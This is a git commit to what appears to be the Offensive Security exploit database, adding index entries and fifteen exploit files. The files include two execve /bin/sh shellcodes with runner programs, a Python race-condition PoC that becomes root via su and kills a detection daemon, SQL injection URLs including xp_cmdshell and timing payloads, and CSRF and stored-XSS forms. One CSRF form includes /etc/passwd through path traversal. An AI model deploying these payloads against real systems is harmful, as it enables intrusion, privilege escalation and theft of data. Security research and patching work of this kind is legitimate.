DB: 2015-04-30

15 new exploits
This commit is contained in:
Offensive Security 2015-04-30 05:03:30 +00:00
parent 428ec4393d
commit 891000cdf7
16 changed files with 685 additions and 5 deletions

View file

@ -33182,7 +33182,7 @@ id,file,description,date,author,platform,type,port
36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
36774,platforms/php/webapps/36774.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download Exploit",2015-04-15,"Necmettin COSKUN",php,webapps,0
36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80
36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) HTTP Request Parsing DoS (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) - HTTP Request Parsing DoS (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 - SQL Injection Vulnerability",2015-04-16,"Claudio Viviani",php,webapps,80
36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 execve ""/bin/sh"" - shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
36779,platforms/win32/shellcode/36779.c,"win32/xp sp3 Create (""file.txt"") (83 bytes)",2015-04-17,"TUNISIAN CYBER",win32,shellcode,0
@ -33193,7 +33193,7 @@ id,file,description,date,author,platform,type,port
36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0
36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password Manipulation CSRF",2012-02-15,"High-Tech Bridge SA",php,webapps,0
36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0
36788,platforms/windows/dos/36788.txt,"Oracle Outside-In DOCX File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0
36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In DOCX File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0
36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial Of Service Vulnerability",2011-12-18,anonymous,php,dos,0
36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross Site Scripting Vulnerability",2012-02-16,"Daniel Godoy",php,webapps,0
36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection Vulnerabilities",2012-02-16,tempe_mendoan,php,webapps,0
@ -33216,8 +33216,13 @@ id,file,description,date,author,platform,type,port
36811,platforms/php/remote/36811.rb,"Wordpress Creative Contact Form Upload Vulnerability",2015-04-21,metasploit,php,remote,80
36812,platforms/php/remote/36812.rb,"Wordpress Work The Flow Upload Vulnerability",2015-04-21,metasploit,php,remote,80
36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
36814,platforms/osx/dos/36814.c,"Mac OS X - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware 'url' Parameter URI Redirection Vulnerability",2012-02-18,sonyy,php,webapps,0
36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x get.php v Parameter Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0
36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection",2012-02-20,"J. Greil",php,webapps,0
36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 Multiple Cross Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0
36852,platforms/php/webapps/36852.txt,"TestLink Multiple SQL Injection Vulnerabilities",2012-02-20,"Juan M. Natal",php,webapps,0
36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
@ -33225,7 +33230,7 @@ id,file,description,date,author,platform,type,port
36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0
36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi",2015-04-23,"Felipe Molina",php,webapps,0
36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi #2",2015-04-23,"Felipe Molina",php,webapps,0
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow (W7 - DEP Bypass)",2015-04-24,naxxo,windows,local,0
36829,platforms/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow and Directory Traversal Vulnerabilities",2012-02-17,"Luigi Auriemma",windows,remote,0
@ -33240,4 +33245,14 @@ id,file,description,date,author,platform,type,port
36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
36847,platforms/windows/dos/36847.py,"i.FTP 2.21 SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0
36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0
36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0
36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x explanation.php explain Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0
36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0
36856,platforms/php/webapps/36856.txt,"Joomla! 'com_xvs' Component 'controller' Parameter Local File Include Vulnerability",2012-02-18,KedAns-Dz,php,webapps,0
36857,platforms/lin_x86/shellcode/36857.c,"Linux x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
36858,platforms/lin_x86-64/shellcode/36858.c,"Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
36859,platforms/windows/local/36859.txt,"Foxit Reader PDF <= 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,"John Page",windows,webapps,5466
36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80

Can't render this file because it is too large.

View file

@ -0,0 +1,63 @@
/*
#
# Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes)
#
# Dying to be the shortest.
#
# Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
#
# 27 April 2015
#
# GPL
#
.global _start
_start:
# char *const argv[]
xorl %esi, %esi
# 'h' 's' '/' '/' 'n' 'i' 'b' '/'
movq $0x68732f2f6e69622f, %rbx
# for '\x00'
pushq %rsi
pushq %rbx
pushq %rsp
# const char *filename
popq %rdi
# __NR_execve 59
pushq $59
popq %rax
# char *const envp[]
xorl %edx, %edx
syscall
*/
/*
gcc -z execstack push64.c
uname -r
3.19.3-3-ARCH
*/
#include <stdio.h>
#include <string.h>
int
main(void)
{
char *shellcode =3D "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56=
\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
((void (*)(void))shellcode)();
return 0;
}

View file

@ -0,0 +1,60 @@
/*
#
# Execve /bin/sh Shellcode Via Push (Linux x86 21 bytes)
#
# Dying to be the shortest.
#
# Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
#
# 18 February 2015
#
# GPL
#
.global _start
_start:
# char *const argv[]
xorl %ecx, %ecx
# 2 bytes, and both %eax and %edx were zeroed
mull %ecx
# __NR_execve 11
movb $11, %al
# for '\x00'
pushl %ecx
# 'h' 's' '/' '/'
pushl $0x68732f2f
# 'n' 'i' 'b' '/'
pushl $0x6e69622f
# const char *filename
movl %esp, %ebx
int $0x80
*/
/*
gcc -z execstack -m32 push.c
uname -r
3.19.3-3-ARCH
*/
#include <stdio.h>
#include <string.h>
int
main(void)
{
char *shellcode =3D "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68=
\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
((void (*)(void))shellcode)();
return 0;
}

82
platforms/linux/local/36855.py Executable file
View file

@ -0,0 +1,82 @@
#[Title] Ninja privilege escalation detection and prevention system race condition
#[Author] Ben 'highjack' Sheppard
#[URL] http://highjack.github.io/
#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
#[Software Link] http://forkbomb.org/ninja/
#[Date] 29/04/2015
#[Version] 0.1.3
#[Tested on] Kali Linux
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg
#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
#https://www.youtube.com/watch?v=eA136fOsSeQ
import pty, os, sys, subprocess
pid, fd = pty.fork()
#begin config
user = "root"
password = "mypassword" #change this :)
command = "killall -9 ninja"
#end config
def usage():
print """
@@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@@ @@@ @@@
@@@ @@@ @@@ @@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@ @@@
@@! @@@ @@! !@@ @@! @@@ @@! @@! @@@ !@@ @@! !@@
!@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! !@! @!!
@!@!@!@! !!@ !@! @!@!@ @!@!@!@! !!@ @!@!@!@! !@! @!@@!@!
!!!@!!!! !!! !!! !!@!! !!!@!!!! !!! !!!@!!!! !!! !!@!!!
!!: !!! !!: :!! !!: !!: !!! !!: !!: !!! :!! !!: :!!
:!: !:! :!: :!: !:: :!: !:! !!: :!: :!: !:! :!: :!: !:!
:: ::: :: ::: :::: :: ::: ::: : :: :: ::: ::: ::: :: :::
: : : : :: :: : : : : : ::: : : : :: :: : : :::
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
[Author] Ben 'highjack' Sheppard
[URL] http://highjack.github.io/
[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
"""
executions = 0
def check_procs():
p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "root"], stdin=p1.stdout, stdout=subprocess.PIPE)
p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
output = p3.communicate()[0]
if output != "":
if executions != 0:
sys.exit(0)
return True
else:
return False
def kill_ninja():
if pid == 0:
os.execvp("su", ["su", user, "-c", command])
elif pid > 0:
try:
os.read(fd, 1024)
os.write(fd, password + "\n")
os.read(fd,1024)
os.wait()
os.close(fd)
except:
usage()
print "[+] Ninja is terminated"
sys.exit(0)
while True:
kill_ninja()
if (check_procs == True):
executions = executions + 1
kill_ninja()

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/52079/info
Tiki Wiki CMS Groupware is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
http://www.example.com/tiki-featured_link.php?type=f&url=http://www.example2.com

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52081/info
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==

12
platforms/php/webapps/36850.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/52081/info
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52085/info
F*EX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
http://www.example.com/fup [id parameter]
http://www.example.com/fup [to parameter]
http://www.example.com/fup [from parameter]

24
platforms/php/webapps/36852.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/52086/info
TestLink is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1
http://www.example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1
http://www.example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND
3653=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622
OR 1=1
http://www.example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))

11
platforms/php/webapps/36853.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/52088/info
Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Dolphin 7.0.7 and prior versions are vulnerable.
http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script>
http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script>
http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52088/info
Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Dolphin 7.0.7 and prior versions are vulnerable.
http://www.example.com/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/52091/info
The 'com_xvs' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_xvs&controller=../../[LFI]%00

143
platforms/php/webapps/36860.txt Executable file
View file

@ -0,0 +1,143 @@
Advisory ID: HTB23254
Product: TheCartPress WordPress plugin
Vendor: TheCartPress team
Vulnerable Version(s): 1.3.9 and probably prior
Tested Version: 1.3.9
Advisory Publication: April 8, 2015 [without technical details]
Vendor Notification: April 8, 2015
Public Disclosure: April 29, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284]
CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302
Risk Level: High
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin.
1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301
Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences.
In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well.
Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it:
<form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" name="main">
<input type="hidden" name="tcp_save_fields" value='1'>
<input type="hidden" name="tcp_box_path" value='../../../../../etc/passwd'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300
During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC)in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database.
Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" scetion is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database:
<form action="http://wordpress/shopping-cart/checkout/" method="post" name="main">
<input type="hidden" name="selected_billing_id" value='1'>
<input type="hidden" name="selected_billing_address" value='new'>
<input type="hidden" name="billing_firstname" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_lastname" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_company" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_tax_id_number" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_country_id" value='AF'>
<input type="hidden" name="billing_region_id" value=''>
<input type="hidden" name="billing_region" value=''>
<input type="hidden" name="billing_city" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_street" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_street_2" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_postcode" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_1" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_2" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_fax" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_email" value='mail@mail.com'>
<input type="hidden" name="tcp_continue" value=''>
<input type="hidden" name="tcp_step" value='1'>
<input type="submit" id="btn">
</form>
A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL:
http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order
As well as on the following URL accessible to WordPress administrator only:
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php
3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302
Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL:
http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]
And just after open the following URL to see full order details:
http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order
Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables non-authenticated remote attacker to steal all currently-existing orders.
4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300
4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
-----------------------------------------------------------------------------------------------
Solution:
2015-04-08 Vendor Alerted via emails.
2015-04-17 Vendor Alerted via contact form and emails.
2015-04-17 Vendor Alerted via WordPress Support Forums.
2015-04-27 Fix Requested via emails.
2015-04-29 Public disclosure.
Currently we are not aware of any official solution for this vulnerability.
According to the vendor the plugin will not be supported anymore since 1st of June 2015: http://thecartpress.com/extend/important-note-nota-importante/
We recommend disabling or removing the vulnerable plugin as a workaround.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23254 - https://www.htbridge.com/advisory/HTB23254 - Multiple vulnerabilities in TheCartPress Wordpress plugin.
[2] TheCartPress Wordpress plugin- http://thecartpress.com/ - Professional WordPress eCommerce Plugin. Use it as Shopping Cart, Catalog or Framework.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

31
platforms/php/webapps/36862.txt Executable file
View file

@ -0,0 +1,31 @@
OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL
injection in the country_id parameter of the request made to retrieve a
list of states for a given country. The version was not bumped when the
vulnerability was fixed, but if you download after April 27th, you
downloaded a fixed version.
http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property
http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html
Example URL:
http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31
Parameter: country_id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload:
option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31'
UNION ALL SELECT
NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)#
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

View file

@ -0,0 +1,65 @@
#####################################################################################
Application: Foxit Reader PDF Parsing Memory Corruption
Platforms: Windows
Versions: The vulnerabilities are reported in Foxit Reader and Foxit Enterprise Reader versions 7.1.0.306 and 7.1.3.320 and Foxit Phantom PDF versions 7.1.0.306, 7.1.2.311, and 7.1.3.320.
Secunia: SA63346
{PRL}: 2015-05
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
(http://en.wikipedia.org/wiki/Foxit_Reader)
#####################################################################################
============================
2) Report Timeline
============================
2015-04-09: Francis Provencher from Protek Research Labs found the issue;
2015-04-13: Foxit Security Response Team confirmed the issue;
2015-04-28: Foxit fixed the issue;
